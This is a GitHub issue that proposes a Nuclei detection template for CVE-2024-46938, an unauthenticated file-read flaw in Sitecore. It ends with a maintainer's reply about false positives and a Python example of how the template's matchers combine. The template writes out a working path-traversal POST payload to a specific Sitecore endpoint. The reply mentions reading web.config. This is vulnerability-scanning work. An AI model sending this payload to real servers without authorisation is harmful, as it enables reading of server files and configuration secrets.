CVE-2024-46938 #11234

Closed
1 task done
vu1nh0lic opened this issue Nov 22, 2024 · 1 comment

vu1nh0lic commented Nov 22, 2024

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: sitecore-file-read-cve-2024-46938

info:
  name: Sitecore Unauthenticated Arbitrary File Read Vulnerability (CVE-2024-46938)
  author: vulnh0lic
  severity: high
  description: |
    This template detects an unauthenticated arbitrary file read vulnerability in Sitecore Experience Platform, Experience Manager, and Experience Commerce from version 8.0 Initial Release through 10.4 Initial Release. An attacker can exploit this vulnerability to read arbitrary files on the server.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x

requests:
  - method: POST
    path:
      - "/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a"
    headers:
      Host: "{{Hostname}}"
      Accept-Encoding: "gzip, deflate, br"
      Accept: "*/*"
      Accept-Language: "en-US;q=0.9,en;q=0.8"
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
      Cache-Control: "max-age=0"
      Content-Type: "application/x-www-form-urlencoded"
    body: |
      __PAGESTATE=/../../a/

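    # Both matchers must hit; without matchers-condition Nuclei ORs the matchers.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Could not find a part of the path"
      - type: word
        part: body
        words:
          - "C:\\inetpub\\wwwroot\\"
    extractors:
      - type: regex
        name: file_path
        group: 1
        part: body
        # Regex extractors take a `regex` list; four backslashes in a double-quoted
        # YAML string give the regex an escaped literal backslash.
        regex:
          - "Could not find a part of the path '(C:\\\\inetpub\\\\wwwroot\\\\[^']+)'"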
@DhiyaneshGeek
Member

Hi @vu1nh0lic

This will give more false positives; it will just return the path.

I have written a full template that reads the web.config file and raised a PR for the same: #11236

So we are closing this PR.

Thanks
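
The reply's concern is that a response containing an error message and a path shows path disclosure, not a file read. As an added example (not code from this issue or from PR #11236), the following Python model of how Nuclei combines word matchers runs the template's two path matchers and a content-based check over constructed response bodies; the web.config marker strings and all sample bodies are assumptions.

```python
# Added example: models Nuclei word-matcher combination on constructed bodies.

def word_matcher(body, words, condition="or"):
    """One `type: word` matcher; `condition` combines the words inside it."""
    hits = [w in body for w in words]
    return all(hits) if condition == "and" else any(hits)

def evaluate(body, matchers, matchers_condition="or"):
    """`matchers-condition` combines whole matchers; Nuclei defaults to `or`."""
    results = [word_matcher(body, m["words"], m.get("condition", "or"))
               for m in matchers]
    return all(results) if matchers_condition == "and" else any(results)

# The two path-disclosure word matchers from the template in this issue.
PATH_ONLY = [
    {"words": ["Could not find a part of the path"]},
    {"words": ["C:\\inetpub\\wwwroot\\"]},
]
# Assumed markers for returned web.config content (not taken from PR #11236).
FILE_CONTENT = [{"words": ["<configuration>", "<system.web"], "condition": "and"}]

# Constructed response bodies, for illustration only.
SAMPLES = {
    "path_error": "Could not find a part of the path 'C:\\inetpub\\wwwroot\\site\\a\\'.",
    "banner_only": "Physical path: C:\\inetpub\\wwwroot\\default.htm",
    "config_read": '<?xml version="1.0"?><configuration><system.web>'
                   "</system.web></configuration>",
    "not_found": "<h1>404 - File or directory not found.</h1>",
}

def report():
    """Return, per sample, which detection logic would fire."""
    out = {}
    for name, body in SAMPLES.items():
        out[name] = {
            "path_or": evaluate(body, PATH_ONLY),          # matchers ORed (default)
            "path_and": evaluate(body, PATH_ONLY, "and"),  # matchers ANDed
            "content": evaluate(body, FILE_CONTENT, "and"),
        }
    return out

if __name__ == "__main__":
    for name, row in report().items():
        print(f"{name:12} {row}")
```

Only the `content` column separates a response that actually returned file contents from one that merely echoed a path in an error.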
